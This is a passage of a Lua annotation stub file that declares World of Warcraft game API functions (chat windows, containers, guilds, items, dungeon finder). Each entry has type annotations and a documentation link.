function GetChatWindowInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetChatWindowMessages)
function GetChatWindowMessages(index) end
---[Documentation](https://wow.gamepedia.com/API_GetChatWindowSavedDimensions)
function GetChatWindowSavedDimensions(index) end
---[Documentation](https://wow.gamepedia.com/API_GetChatWindowSavedPosition)
function GetChatWindowSavedPosition(index) end
---@param classIndex number
---@return string className
---@return string classFile
---@return number classID
---[Documentation](https://wow.gamepedia.com/API_GetClassInfo)
function GetClassInfo(classIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetClickFrame)
function GetClickFrame(name) end
---[Documentation](https://wow.gamepedia.com/API_GetCoinIcon)
function GetCoinIcon(amount) end
---@param amount number
---@param separator string
---@return string formattedAmount
---[Documentation](https://wow.gamepedia.com/API_GetCoinText)
function GetCoinText(amount, separator) end
---[Documentation](https://wow.gamepedia.com/API_GetCoinTextureString)
function GetCoinTextureString(amount, fontHeight) end
---@param combatRatingIdentifier number
---@return number rating
---[Documentation](https://wow.gamepedia.com/API_GetCombatRating)
function GetCombatRating(combatRatingIdentifier) end
---@param combatRatingIdentifier number
---@return number bonus
---[Documentation](https://wow.gamepedia.com/API_GetCombatRatingBonus)
function GetCombatRatingBonus(combatRatingIdentifier) end
---[Documentation](https://wow.gamepedia.com/API_GetCombatRatingBonusForCombatRatingValue)
function GetCombatRatingBonusForCombatRatingValue(ratingIndex, value) end
---@param unit string
---@param target string
---@return number comboPoints
---[Documentation](https://wow.gamepedia.com/API_GetComboPoints)
function GetComboPoints(unit, target) end
---[Documentation](https://wow.gamepedia.com/API_GetCompanionInfo)
function GetCompanionInfo(type, slotid) end
---[Documentation](https://wow.gamepedia.com/API_GetComparisonAchievementPoints)
function GetComparisonAchievementPoints() end
---[Documentation](https://wow.gamepedia.com/API_GetComparisonCategoryNumAchievements)
function GetComparisonCategoryNumAchievements(achievementID) end
---@param achievementID number
---@return string value
---[Documentation](https://wow.gamepedia.com/API_GetComparisonStatistic)
function GetComparisonStatistic(achievementID) end
---[Documentation](https://wow.gamepedia.com/API_GetContainerFreeSlots)
function GetContainerFreeSlots(index, returnTable) end
---[Documentation](https://wow.gamepedia.com/API_GetContainerItemCooldown)
function GetContainerItemCooldown(bagID, slot) end
---@param bag number
---@param slot number
---@return number current
---@return number maximum
---[Documentation](https://wow.gamepedia.com/API_GetContainerItemDurability)
function GetContainerItemDurability(bag, slot) end
---[Documentation](https://wow.gamepedia.com/API_GetContainerItemEquipmentSetInfo)
function GetContainerItemEquipmentSetInfo(index, slot) end
---@param bag number
---@param slot number
---@return number itemId
---[Documentation](https://wow.gamepedia.com/API_GetContainerItemID)
function GetContainerItemID(bag, slot) end
---[Documentation](https://wow.gamepedia.com/API_GetContainerItemInfo)
function GetContainerItemInfo(bagID, slot) end
---[Documentation](https://wow.gamepedia.com/API_GetContainerItemLink)
function GetContainerItemLink(bagID, slot) end
---[Documentation](https://wow.gamepedia.com/API_GetContainerItemPurchaseCurrency)
function GetContainerItemPurchaseCurrency(bag, slot, itemIndex, isEquipped) end
---[Documentation](https://wow.gamepedia.com/API_GetContainerItemPurchaseInfo)
function GetContainerItemPurchaseInfo(index, slot, isEquipped) end
---[Documentation](https://wow.gamepedia.com/API_GetContainerItemPurchaseItem)
function GetContainerItemPurchaseItem(bag, slot, itemIndex, isEquipped) end
---[Documentation](https://wow.gamepedia.com/API_GetContainerItemQuestInfo)
function GetContainerItemQuestInfo(bag, slot) end
---@param bagID number
---@return number numberOfFreeSlots
---@return number bagType
---[Documentation](https://wow.gamepedia.com/API_GetContainerNumFreeSlots)
function GetContainerNumFreeSlots(bagID) end
---@param bagID number
---@return number numberOfSlots
---[Documentation](https://wow.gamepedia.com/API_GetContainerNumSlots)
function GetContainerNumSlots(bagID) end
---[Documentation](https://wow.gamepedia.com/API_GetCorpseRecoveryDelay)
function GetCorpseRecoveryDelay() end
---@return number corruption
---[Documentation](https://wow.gamepedia.com/API_GetCorruption)
function GetCorruption() end
---@return number corruptionResistance
---[Documentation](https://wow.gamepedia.com/API_GetCorruptionResistance)
function GetCorruptionResistance() end
---@return number critChance
---[Documentation](https://wow.gamepedia.com/API_GetCritChance)
function GetCritChance() end
---[Documentation](https://wow.gamepedia.com/API_GetCritChanceProvidesParryEffect)
function GetCritChanceProvidesParryEffect() end
---[Documentation](https://wow.gamepedia.com/API_GetCriteriaSpell)
function GetCriteriaSpell() end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentArenaSeason)
function GetCurrentArenaSeason() end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentBindingSet)
function GetCurrentBindingSet() end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentCombatTextEventInfo)
function GetCurrentCombatTextEventInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentEventID)
function GetCurrentEventID() end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentGlyphNameForSpell)
function GetCurrentGlyphNameForSpell(spellID) end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentGraphicsSetting)
function GetCurrentGraphicsSetting() end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentGuildBankTab)
function GetCurrentGuildBankTab() end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentKeyBoardFocus)
function GetCurrentKeyBoardFocus() end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentLevelFeatures)
function GetCurrentLevelFeatures(level) end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentLevelSpells)
function GetCurrentLevelSpells(level) end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentRegion)
function GetCurrentRegion() end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentResolution)
function GetCurrentResolution() end
---[Documentation](https://wow.gamepedia.com/API_GetCurrentScaledResolution)
function GetCurrentScaledResolution() end
---@return number currentTitle
---[Documentation](https://wow.gamepedia.com/API_GetCurrentTitle)
function GetCurrentTitle() end
---[Documentation](https://wow.gamepedia.com/API_GetCursorDelta)
function GetCursorDelta() end
---[Documentation](https://wow.gamepedia.com/API_GetCursorInfo)
function GetCursorInfo() end
---@return number copper
---[Documentation](https://wow.gamepedia.com/API_GetCursorMoney)
function GetCursorMoney() end
---@return number x
---@return number y
---[Documentation](https://wow.gamepedia.com/API_GetCursorPosition)
function GetCursorPosition() end
---[Documentation](https://wow.gamepedia.com/API_GetCustomizationDetails)
function GetCustomizationDetails(customizationIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetDailyQuestsCompleted)
function GetDailyQuestsCompleted() end
---[Documentation](https://wow.gamepedia.com/API_GetDeathRecapLink)
function GetDeathRecapLink(recapID) end
---[Documentation](https://wow.gamepedia.com/API_GetDefaultGraphicsQuality)
function GetDefaultGraphicsQuality() end
---[Documentation](https://wow.gamepedia.com/API_GetDefaultLanguage)
function GetDefaultLanguage(unit) end
---[Documentation](https://wow.gamepedia.com/API_GetDefaultScale)
function GetDefaultScale() end
---[Documentation](https://wow.gamepedia.com/API_GetDefaultVideoOption)
function GetDefaultVideoOption() end
---[Documentation](https://wow.gamepedia.com/API_GetDefaultVideoOptions)
function GetDefaultVideoOptions() end
---[Documentation](https://wow.gamepedia.com/API_GetDefaultVideoQualityOption)
function GetDefaultVideoQualityOption() end
---[Documentation](https://wow.gamepedia.com/API_GetDemotionRank)
function GetDemotionRank(index) end
---[Documentation](https://wow.gamepedia.com/API_GetDetailedItemLevelInfo)
function GetDetailedItemLevelInfo(item) end
---@param id number
---@return string name
---@return string groupType
---@return boolean isHeroic
---@return boolean isChallengeMode
---@return boolean displayHeroic
---@return boolean displayMythic
---@return number toggleDifficultyID
---[Documentation](https://wow.gamepedia.com/API_GetDifficultyInfo)
function GetDifficultyInfo(id) end
---@return number dodgeChance
---[Documentation](https://wow.gamepedia.com/API_GetDodgeChance)
function GetDodgeChance() end
---[Documentation](https://wow.gamepedia.com/API_GetDodgeChanceFromAttribute)
function GetDodgeChanceFromAttribute() end
---[Documentation](https://wow.gamepedia.com/API_GetDownloadedPercentage)
function GetDownloadedPercentage() end
---@return number difficultyID
---[Documentation](https://wow.gamepedia.com/API_GetDungeonDifficultyID)
function GetDungeonDifficultyID() end
---[Documentation](https://wow.gamepedia.com/API_GetDungeonForRandomSlot)
function GetDungeonForRandomSlot(randomID, index) end
---[Documentation](https://wow.gamepedia.com/API_GetDungeonInfo)
function GetDungeonInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetEquipmentNameFromSpell)
function GetEquipmentNameFromSpell() end
---[Documentation](https://wow.gamepedia.com/API_GetEventCPUUsage)
function GetEventCPUUsage(event) end
---[Documentation](https://wow.gamepedia.com/API_GetEventTime)
function GetEventTime(eventProfileIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetExistingSocketInfo)
function GetExistingSocketInfo(id) end
---[Documentation](https://wow.gamepedia.com/API_GetExistingSocketLink)
function GetExistingSocketLink(id) end
---@return number expertise
---@return number offhandExpertise
---@return number rangedExpertise
---[Documentation](https://wow.gamepedia.com/API_GetExpertise)
function GetExpertise() end
---@return number extraPage
---[Documentation](https://wow.gamepedia.com/API_GetExtraBarIndex)
function GetExtraBarIndex() end
---[Documentation](https://wow.gamepedia.com/API_GetFactionInfo)
function GetFactionInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetFactionInfoByID)
function GetFactionInfoByID(factionID) end
---[Documentation](https://wow.gamepedia.com/API_GetFailedPVPTalentIDs)
function GetFailedPVPTalentIDs() end
---[Documentation](https://wow.gamepedia.com/API_GetFailedTalentIDs)
function GetFailedTalentIDs() end
---@param filePath string
---@return number fileID
---[Documentation](https://wow.gamepedia.com/API_GetFileIDFromPath)
function GetFileIDFromPath(filePath) end
---[Documentation](https://wow.gamepedia.com/API_GetFileStreamingStatus)
function GetFileStreamingStatus() end
---@param index number
---@return number achievementID
---[Documentation](https://wow.gamepedia.com/API_GetFilteredAchievementID)
function GetFilteredAchievementID(index) end
---[Documentation](https://wow.gamepedia.com/API_GetFlexRaidDungeonInfo)
function GetFlexRaidDungeonInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetFlyoutID)
function GetFlyoutID(index) end
---[Documentation](https://wow.gamepedia.com/API_GetFlyoutInfo)
function GetFlyoutInfo(flyoutID) end
---[Documentation](https://wow.gamepedia.com/API_GetFlyoutSlotInfo)
function GetFlyoutSlotInfo(flyoutID, slot) end
---[Documentation](https://wow.gamepedia.com/API_GetFollowerTypeIDFromSpell)
function GetFollowerTypeIDFromSpell() end
---[Documentation](https://wow.gamepedia.com/API_GetFontInfo)
function GetFontInfo() end
---@return string fonts
---[Documentation](https://wow.gamepedia.com/API_GetFonts)
function GetFonts() end
---[Documentation](https://wow.gamepedia.com/API_GetFrameCPUUsage)
function GetFrameCPUUsage(frame, includeChildren) end
---[Documentation](https://wow.gamepedia.com/API_GetFramerate)
function GetFramerate() end
---[Documentation](https://wow.gamepedia.com/API_GetFramesRegisteredForEvent)
function GetFramesRegisteredForEvent(event) end
---@param factionID number
---@return number friendID
---@return number friendRep
---@return number friendMaxRep
---@return string friendName
---@return string friendText
---@return number friendTexture
---@return string friendTextLevel
---@return number friendThreshold
---@return number nextFriendThreshold
---[Documentation](https://wow.gamepedia.com/API_GetFriendshipReputation)
function GetFriendshipReputation(factionID) end
---@param factionID number
---@return number currentRank
---@return number maxRank
---[Documentation](https://wow.gamepedia.com/API_GetFriendshipReputationRanks)
function GetFriendshipReputationRanks(factionID) end
---[Documentation](https://wow.gamepedia.com/API_GetFunctionCPUUsage)
function GetFunctionCPUUsage(func, includeSubroutines) end
---[Documentation](https://wow.gamepedia.com/API_GetGMStatus)
function GetGMStatus() end
---[Documentation](https://wow.gamepedia.com/API_GetGMTicket)
function GetGMTicket() end
---[Documentation](https://wow.gamepedia.com/API_GetGameMessageInfo)
function GetGameMessageInfo(gameMessageType) end
---[Documentation](https://wow.gamepedia.com/API_GetGameTime)
function GetGameTime() end
---@return string cvarValues
---[Documentation](https://wow.gamepedia.com/API_GetGraphicsAPIs)
function GetGraphicsAPIs() end
---[Documentation](https://wow.gamepedia.com/API_GetGraphicsDropdownIndexByMasterIndex)
function GetGraphicsDropdownIndexByMasterIndex() end
---[Documentation](https://wow.gamepedia.com/API_GetGreetingText)
function GetGreetingText() end
---[Documentation](https://wow.gamepedia.com/API_GetGroupMemberCounts)
function GetGroupMemberCounts() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildAchievementMemberInfo)
function GetGuildAchievementMemberInfo(achievementID, index) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildAchievementMembers)
function GetGuildAchievementMembers(achievementID) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildAchievementNumMembers)
function GetGuildAchievementNumMembers(achievementID) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildApplicantInfo)
function GetGuildApplicantInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildApplicantSelection)
function GetGuildApplicantSelection() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankBonusDepositMoney)
function GetGuildBankBonusDepositMoney() end
---@param tab number
---@param slot number
---@return number texture
---@return number itemCount
---@return boolean locked
---@return boolean isFiltered
---@return number quality
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankItemInfo)
function GetGuildBankItemInfo(tab, slot) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankItemLink)
function GetGuildBankItemLink(tab, slot) end
---@return number retVal1
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankMoney)
function GetGuildBankMoney() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankMoneyTransaction)
function GetGuildBankMoneyTransaction(index) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankTabCost)
function GetGuildBankTabCost() end
---@param tab number
---@return string name
---@return string icon
---@return boolean isViewable
---@return boolean canDeposit
---@return number numWithdrawals
---@return number remainingWithdrawals
---@return boolean filtered
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankTabInfo)
function GetGuildBankTabInfo(tab) end
---@param tab number
---@return boolean canView
---@return boolean canDeposit
---@return boolean canEdit
---@return number stacksPerDay
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankTabPermissions)
function GetGuildBankTabPermissions(tab) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankText)
function GetGuildBankText(tab) end
---@param tab number
---@param index number
---@return string type
---@return string name
---@return string itemLink
---@return number count
---@return number tab1
---@return number tab2
---@return number year
---@return number month
---@return number day
---@return number hour
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankTransaction)
function GetGuildBankTransaction(tab, index) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankWithdrawGoldLimit)
function GetGuildBankWithdrawGoldLimit() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildBankWithdrawMoney)
function GetGuildBankWithdrawMoney() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildCategoryList)
function GetGuildCategoryList() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildChallengeInfo)
function GetGuildChallengeInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildCharterCost)
function GetGuildCharterCost() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildEventInfo)
function GetGuildEventInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildExpirationTime)
function GetGuildExpirationTime() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildFactionGroup)
function GetGuildFactionGroup() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildFactionInfo)
function GetGuildFactionInfo() end
---@param unit string
---@return string guildName
---@return string guildRankName
---@return number guildRankIndex
---@return string realm
---[Documentation](https://wow.gamepedia.com/API_GetGuildInfo)
function GetGuildInfo(unit) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildInfoText)
function GetGuildInfoText() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildLogoInfo)
function GetGuildLogoInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildMemberRecipes)
function GetGuildMemberRecipes(name, skillLineID) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildMembershipRequestInfo)
function GetGuildMembershipRequestInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildMembershipRequestSettings)
function GetGuildMembershipRequestSettings() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildNewsFilters)
function GetGuildNewsFilters() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildNewsMemberName)
function GetGuildNewsMemberName(index, nameIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildNewsSort)
function GetGuildNewsSort() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildPerkInfo)
function GetGuildPerkInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildRecipeInfoPostQuery)
function GetGuildRecipeInfoPostQuery() end
---@param index number
---@return string name
---@return boolean online
---[Documentation](https://wow.gamepedia.com/API_GetGuildRecipeMember)
function GetGuildRecipeMember(index) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildRecruitmentComment)
function GetGuildRecruitmentComment() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildRecruitmentSettings)
function GetGuildRecruitmentSettings() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildRenameRequired)
function GetGuildRenameRequired() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildRewardInfo)
function GetGuildRewardInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildRosterInfo)
function GetGuildRosterInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetGuildRosterLargestAchievementPoints)
function GetGuildRosterLargestAchievementPoints() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildRosterLastOnline)
function GetGuildRosterLastOnline(index) end
---@return string motd
---[Documentation](https://wow.gamepedia.com/API_GetGuildRosterMOTD)
function GetGuildRosterMOTD() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildRosterSelection)
function GetGuildRosterSelection() end
---[Documentation](https://wow.gamepedia.com/API_GetGuildRosterShowOffline)
function GetGuildRosterShowOffline() end
---@return number tabardBackgroundUpper
---@return number tabardBackgroundLower
---@return number tabardEmblemUpper
---@return number tabardEmblemLower
---@return number tabardBorderUpper
---@return number tabardBorderLower
---[Documentation](https://wow.gamepedia.com/API_GetGuildTabardFiles)
function GetGuildTabardFiles() end
---@param index number
---@return number skillID
---@return boolean isCollapsed
---@return string iconTexture
---@return string headerName
---@return number numOnline
---@return number numVisible
---@return number numPlayers
---@return string playerName
---@return string playerNameWithRealm
---@return string class
---@return boolean online
---@return string zone
---@return number skill
---@return string classFileName
---@return boolean isMobile
---@return number isAway
---[Documentation](https://wow.gamepedia.com/API_GetGuildTradeSkillInfo)
function GetGuildTradeSkillInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetHaste)
function GetHaste() end
---@return number hitModifier
---[Documentation](https://wow.gamepedia.com/API_GetHitModifier)
function GetHitModifier() end
---@param homePlayers table
---@return table homePlayers
---[Documentation](https://wow.gamepedia.com/API_GetHomePartyInfo)
function GetHomePartyInfo(homePlayers) end
---[Documentation](https://wow.gamepedia.com/API_GetInboxHeaderInfo)
function GetInboxHeaderInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetInboxInvoiceInfo)
function GetInboxInvoiceInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetInboxItem)
function GetInboxItem(index, itemIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetInboxItemLink)
function GetInboxItemLink(index, itemIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetInboxNumItems)
function GetInboxNumItems() end
---[Documentation](https://wow.gamepedia.com/API_GetInboxText)
function GetInboxText(index) end
---[Documentation](https://wow.gamepedia.com/API_GetInsertItemsLeftToRight)
function GetInsertItemsLeftToRight() end
---@param bracketId number
---@return number rating
---@return number seasonPlayed
---@return number seasonWon
---@return number weeklyPlayed
---@return number weeklyWon
---[Documentation](https://wow.gamepedia.com/API_GetInspectArenaData)
function GetInspectArenaData(bracketId) end
---[Documentation](https://wow.gamepedia.com/API_GetInspectGuildInfo)
function GetInspectGuildInfo(unit) end
---@return number todayHK
---@return number todayHonor
---@return number yesterdayHK
---@return number yesterdayHonor
---@return number lifetimeHK
---@return number lifetimeRank
---[Documentation](https://wow.gamepedia.com/API_GetInspectHonorData)
function GetInspectHonorData() end
---[Documentation](https://wow.gamepedia.com/API_GetInspectRatedBGData)
function GetInspectRatedBGData() end
---@param unit string
---@return number id
---[Documentation](https://wow.gamepedia.com/API_GetInspectSpecialization)
function GetInspectSpecialization(unit) end
---[Documentation](https://wow.gamepedia.com/API_GetInspectTalent)
function GetInspectTalent() end
---[Documentation](https://wow.gamepedia.com/API_GetInstanceBootTimeRemaining)
function GetInstanceBootTimeRemaining() end
---@return string name
---@return string instanceType
---@return number difficultyID
---@return string difficultyName
---@return number maxPlayers
---@return number dynamicDifficulty
---@return boolean isDynamic
---@return number instanceID
---@return number instanceGroupSize
---@return number LfgDungeonID
---[Documentation](https://wow.gamepedia.com/API_GetInstanceInfo)
function GetInstanceInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetInstanceLockTimeRemaining)
function GetInstanceLockTimeRemaining() end
---@param id number
---@return string bossName
---@return string texture
---@return boolean isKilled
---[Documentation](https://wow.gamepedia.com/API_GetInstanceLockTimeRemainingEncounter)
function GetInstanceLockTimeRemainingEncounter(id) end
---@param index string
---@return number alertStatus
---[Documentation](https://wow.gamepedia.com/API_GetInventoryAlertStatus)
function GetInventoryAlertStatus(index) end
---[Documentation](https://wow.gamepedia.com/API_GetInventoryItemBroken)
function GetInventoryItemBroken(unit, invSlot) end
---[Documentation](https://wow.gamepedia.com/API_GetInventoryItemCooldown)
function GetInventoryItemCooldown(unit, invSlot) end
---[Documentation](https://wow.gamepedia.com/API_GetInventoryItemCount)
function GetInventoryItemCount(unit, invSlot) end
---@param slot number
---@return number current
---@return number maximum
---[Documentation](https://wow.gamepedia.com/API_GetInventoryItemDurability)
function GetInventoryItemDurability(slot) end
---[Documentation](https://wow.gamepedia.com/API_GetInventoryItemEquippedUnusable)
function GetInventoryItemEquippedUnusable(unit, slot) end
---@param unit string
---@param invSlot number
---@return number itemId
---@return number unknown
---[Documentation](https://wow.gamepedia.com/API_GetInventoryItemID)
function GetInventoryItemID(unit, invSlot) end
---[Documentation](https://wow.gamepedia.com/API_GetInventoryItemLink)
function GetInventoryItemLink(unit, invSlot) end
---[Documentation](https://wow.gamepedia.com/API_GetInventoryItemQuality)
function GetInventoryItemQuality(unit, invSlot) end
---[Documentation](https://wow.gamepedia.com/API_GetInventoryItemTexture)
function GetInventoryItemTexture(unit, invSlot) end
---[Documentation](https://wow.gamepedia.com/API_GetInventoryItemsForSlot)
function GetInventoryItemsForSlot(slot, returnTable, transmogrify) end
---[Documentation](https://wow.gamepedia.com/API_GetInventorySlotInfo)
function GetInventorySlotInfo(invSlotName) end
---[Documentation](https://wow.gamepedia.com/API_GetInviteConfirmationInfo)
function GetInviteConfirmationInfo(guid) end
---[Documentation](https://wow.gamepedia.com/API_GetItemChildInfo)
function GetItemChildInfo(item, slotID) end
---@param classID number
---@return string name
---[Documentation](https://wow.gamepedia.com/API_GetItemClassInfo)
function GetItemClassInfo(classID) end
---[Documentation](https://wow.gamepedia.com/API_GetItemCooldown)
function GetItemCooldown(itemId) end
---@param itemInfo string
---@param includeBank boolean
---@param includeUses boolean
---@param includeReagentBank boolean
---@return number count
---[Documentation](https://wow.gamepedia.com/API_GetItemCount)
function GetItemCount(itemInfo, includeBank, includeUses, includeReagentBank) end
---[Documentation](https://wow.gamepedia.com/API_GetItemCreationContext)
function GetItemCreationContext(itemlink) end
---[Documentation](https://wow.gamepedia.com/API_GetItemFamily)
function GetItemFamily(item) end
---[Documentation](https://wow.gamepedia.com/API_GetItemGem)
function GetItemGem(item, index) end
---@param itemID number
---@return number icon
---[Documentation](https://wow.gamepedia.com/API_GetItemIcon)
function GetItemIcon(itemID) end
---[Documentation](https://wow.gamepedia.com/API_GetItemInfo)
function GetItemInfo(item) end
---[Documentation](https://wow.gamepedia.com/API_GetItemInfoInstant)
function GetItemInfoInstant(item) end
---[Documentation](https://wow.gamepedia.com/API_GetItemInventorySlotInfo)
function GetItemInventorySlotInfo(inventorySlot) end
---[Documentation](https://wow.gamepedia.com/API_GetItemLevelColor)
function GetItemLevelColor() end
---@return number itemLevelIncrement
---[Documentation](https://wow.gamepedia.com/API_GetItemLevelIncrement)
function GetItemLevelIncrement() end
---@param quality number
---@return number r
---@return number g
---@return number b
---@return string hex
---[Documentation](https://wow.gamepedia.com/API_GetItemQualityColor)
function GetItemQualityColor(quality) end
---[Documentation](https://wow.gamepedia.com/API_GetItemSetInfo)
function GetItemSetInfo(setID) end
---[Documentation](https://wow.gamepedia.com/API_GetItemSpecInfo)
function GetItemSpecInfo(item, specTable) end
---[Documentation](https://wow.gamepedia.com/API_GetItemSpell)
function GetItemSpell(item) end
---[Documentation](https://wow.gamepedia.com/API_GetItemStatDelta)
function GetItemStatDelta(itemLink1, itemLink2, statTable) end
---[Documentation](https://wow.gamepedia.com/API_GetItemStats)
function GetItemStats(itemLink, statTable) end
---@param classID number
---@param subClassID number
---@return string name
---@return boolean isArmorType
---[Documentation](https://wow.gamepedia.com/API_GetItemSubClassInfo)
function GetItemSubClassInfo(classID, subClassID) end
---[Documentation](https://wow.gamepedia.com/API_GetItemUniqueness)
function GetItemUniqueness(item) end
---@return number itemLevel
---[Documentation](https://wow.gamepedia.com/API_GetItemUpdateLevel)
function GetItemUpdateLevel() end
---@param effectIndex number
---@return string leftText
---@return string rightText
---[Documentation](https://wow.gamepedia.com/API_GetItemUpgradeEffect)
function GetItemUpgradeEffect(effectIndex) end
---@return number icon
---@return string name
---@return number quality
---@return string bound
---@return number numCurrUpgrades
---@return number numMaxUpgrades
---@return number cost
---@return number currencyType
---@return string failureMessage
---[Documentation](https://wow.gamepedia.com/API_GetItemUpgradeItemInfo)
function GetItemUpgradeItemInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetItemUpgradeStats)
function GetItemUpgradeStats(upgraded) end
---[Documentation](https://wow.gamepedia.com/API_GetJailersTowerLevel)
function GetJailersTowerLevel() end
---[Documentation](https://wow.gamepedia.com/API_GetJournalInfoForSpellConfirmation)
function GetJournalInfoForSpellConfirmation(spellID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFDChoiceCollapseState)
function GetLFDChoiceCollapseState(LFGCollapseList) end
---[Documentation](https://wow.gamepedia.com/API_GetLFDChoiceEnabledState)
function GetLFDChoiceEnabledState(LFGEnabledList) end
---[Documentation](https://wow.gamepedia.com/API_GetLFDChoiceOrder)
function GetLFDChoiceOrder(LFDDungeonList) end
---[Documentation](https://wow.gamepedia.com/API_GetLFDLockInfo)
function GetLFDLockInfo(dungeonID, playerIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFDLockPlayerCount)
function GetLFDLockPlayerCount() end
---[Documentation](https://wow.gamepedia.com/API_GetLFDRoleLockInfo)
function GetLFDRoleLockInfo(dungeonID, roleID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFDRoleRestrictions)
function GetLFDRoleRestrictions(dungeonID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGBootProposal)
function GetLFGBootProposal() end
---[Documentation](https://wow.gamepedia.com/API_GetLFGCategoryForID)
function GetLFGCategoryForID(partySlot) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGCompletionReward)
function GetLFGCompletionReward() end
---[Documentation](https://wow.gamepedia.com/API_GetLFGCompletionRewardItem)
function GetLFGCompletionRewardItem(rewardIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGCompletionRewardItemLink)
function GetLFGCompletionRewardItemLink(rewardIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGDeserterExpiration)
function GetLFGDeserterExpiration() end
---@param dungeonID number
---@param encounterIndex number
---@return string bossName
---@return string texture
---@return boolean isKilled
---@return boolean unknown4
---[Documentation](https://wow.gamepedia.com/API_GetLFGDungeonEncounterInfo)
function GetLFGDungeonEncounterInfo(dungeonID, encounterIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGDungeonInfo)
function GetLFGDungeonInfo(dungeonID) end
---@param dungeonID number
---@return number numEncounters
---@return number numCompleted
---[Documentation](https://wow.gamepedia.com/API_GetLFGDungeonNumEncounters)
function GetLFGDungeonNumEncounters(dungeonID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGDungeonRewardCapBarInfo)
function GetLFGDungeonRewardCapBarInfo(dungeonID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGDungeonRewardCapInfo)
function GetLFGDungeonRewardCapInfo(dungeonID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGDungeonRewardInfo)
function GetLFGDungeonRewardInfo(dungeonID, rewardIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGDungeonRewardLink)
function GetLFGDungeonRewardLink(dungeonID, rewardIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGDungeonRewards)
function GetLFGDungeonRewards(dungeonID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGDungeonShortageRewardInfo)
function GetLFGDungeonShortageRewardInfo(dungeonID, shortageIndex, rewardIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGDungeonShortageRewardLink)
function GetLFGDungeonShortageRewardLink(dungeonID, shortageIndex, rewardIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGInfoServer)
function GetLFGInfoServer(category, lfgID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGInviteRoleAvailability)
function GetLFGInviteRoleAvailability(roleID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGInviteRoleRestrictions)
function GetLFGInviteRoleRestrictions(roleID) end
---[Documentation](https://wow.gamepedia.com/API_GetLFGProposal)
function GetLFGProposal() end
